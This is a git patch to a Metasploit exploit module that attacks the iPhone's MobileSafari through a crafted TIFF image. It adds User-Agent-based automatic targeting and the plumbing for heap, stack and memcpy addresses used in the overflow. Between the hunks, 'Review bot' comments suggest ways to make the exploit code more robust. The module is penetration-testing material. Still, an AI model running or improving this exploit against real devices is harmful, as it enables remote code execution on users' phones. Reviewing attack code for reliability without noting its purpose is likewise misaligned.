From 3050615029b5eda3be1282c08dd032b07fbbffea Mon Sep 17 00:00:00 2001 From: HD Moore Date: Mon, 15 Oct 2007 21:00:10 +0000 Subject: [PATCH] Automatic targetting git-svn-id: file:///home/svn/framework3/trunk@5147 4d416f70-5f16-0410-b530-b9f4589650da --- modules/exploits/osx/armle/safari_libtiff.rb | 33 +++++++++++++++----- 1 file changed, 26 insertions(+), 7 deletions(-) diff --git a/modules/exploits/osx/armle/safari_libtiff.rb b/modules/exploits/osx/armle/safari_libtiff.rb index db5c564197..5880bf2c26 100644 --- a/modules/exploits/osx/armle/safari_libtiff.rb +++ b/modules/exploits/osx/armle/safari_libtiff.rb @@ -58,6 +58,14 @@ class Exploits::Osx::Armle::SafariLibTIFF < Msf::Exploit::Remote }, 'Targets' => [ + [ 'MobileSafari iPhone Mac OS X Automatic', + { + 'Platform' => 'osx', + 'Arch' => ARCH_ARMLE, + 'Automatic' => true + } + ], + [ 'MobileSafari iPhone Mac OS X armle (1.00, 1.01, 1.02)', { 'Platform' => 'osx', @@ -77,25 +85,36 @@ class Exploits::Osx::Armle::SafariLibTIFF < Msf::Exploit::Remote } ], ], + 'DefaultTarget' => 0, 'DisclosureDate' => 'Aug 01 2006' )) end - def on_request_uri(cli, request) + def on_request_uri(cli, req) # Re-generate the payload return if ((p = regenerate_payload(cli)) == nil) - print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") + t = target + if(target['Automatic']) + + t = self.targets[1] + case req.headers['User-Agent'] + when /iPhone.*420\.1/ + t = self.targets[2] + end + end + + print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport} #{t.name}...") # Transmit the compressed response to the client - send_response(cli, generate_tiff(p), { 'Content-Type' => 'image/tiff' }) + send_response(cli, generate_tiff(p, t), { 'Content-Type' => 'image/tiff' }) # Handle the payload handler(cli) end - def generate_tiff(code) + def generate_tiff(code, targ) path = File.join(Msf::Config.install_root, "data", "exploits", "iphone_libtiff.bin") 
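Review bot: The automatic branch in on_request_uri picks concrete targets by position, `t = self.targets[1]` and `t = self.targets[2]`, which couples this method to the order of the 'Targets' array in the first hunk and silently selects the wrong entry if that list is reordered or extended; looking the entries up by name, or at least stating the coupling, would make the dependency visible. A comment on the `t = self.targets[1]` line such as `# positional: index 0 is the Automatic placeholder, 1 and 2 must match the 'Targets' order above` is the minimum. The retained `return if ((p = regenerate_payload(cli)) == nil)` reads more idiomatically as `return unless (p = regenerate_payload(cli))`, and `if(target['Automatic'])` wants a space after `if`. The `def generate_tiff(code, targ)` at the end of the hunk opens a method whose body continues outside it.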
@@ -115,8 +134,8 @@ class Exploits::Osx::Armle::SafariLibTIFF < Msf::Exploit::Remote
  # return back to the heap location we copied the stack to.
  #
- dst_ptr = target['Heap']
- src_ptr = target['Stack']
+ dst_ptr = targ['Heap']
+ src_ptr = targ['Stack']
  shl_len = 168 + payload.encoded.length
  # Still some wonky characters in here, this doesn't work with alpha/english/etc
@@ -127,7 +146,7 @@ class Exploits::Osx::Armle::SafariLibTIFF < Msf::Exploit::Remote
  # memcpy(r0, r1, r2)
- patt[140,4] = [target['Memcpy']].pack("V") # memcpy @ 0x3009a1bc
+ patt[140,4] = [targ['Memcpy']].pack("V") # memcpy @ 0x3009a1bc
  patt[124,4] = [dst_ptr].pack("V") # dst
  patt[128,4] = [src_ptr].pack("V") # src
  patt[132,4] = [shl_len].pack("V") # len
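Review bot: generate_tiff now reads `targ['Heap']`, `targ['Stack']` and, in the following hunk, `targ['Memcpy']`, but the new Automatic target entry added in the first hunk carries none of those keys, so if that entry ever reaches this method the `pack("V")` calls would fail on a nil value rather than with a clear message. on_request_uri does replace the automatic target before calling generate_tiff, but that invariant lives in a different method and is easy to break when targets are edited. A guard at the top of generate_tiff (its definition starts in the previous hunk, outside this one), such as `raise ArgumentError, "generate_tiff requires a concrete target, not the Automatic entry" if targ['Automatic']`, would make the precondition explicit and fail fast. A one-line comment on the `dst_ptr = targ['Heap']` line, `# targ must be a concrete target carrying 'Heap', 'Stack' and 'Memcpy'`, would document the same contract.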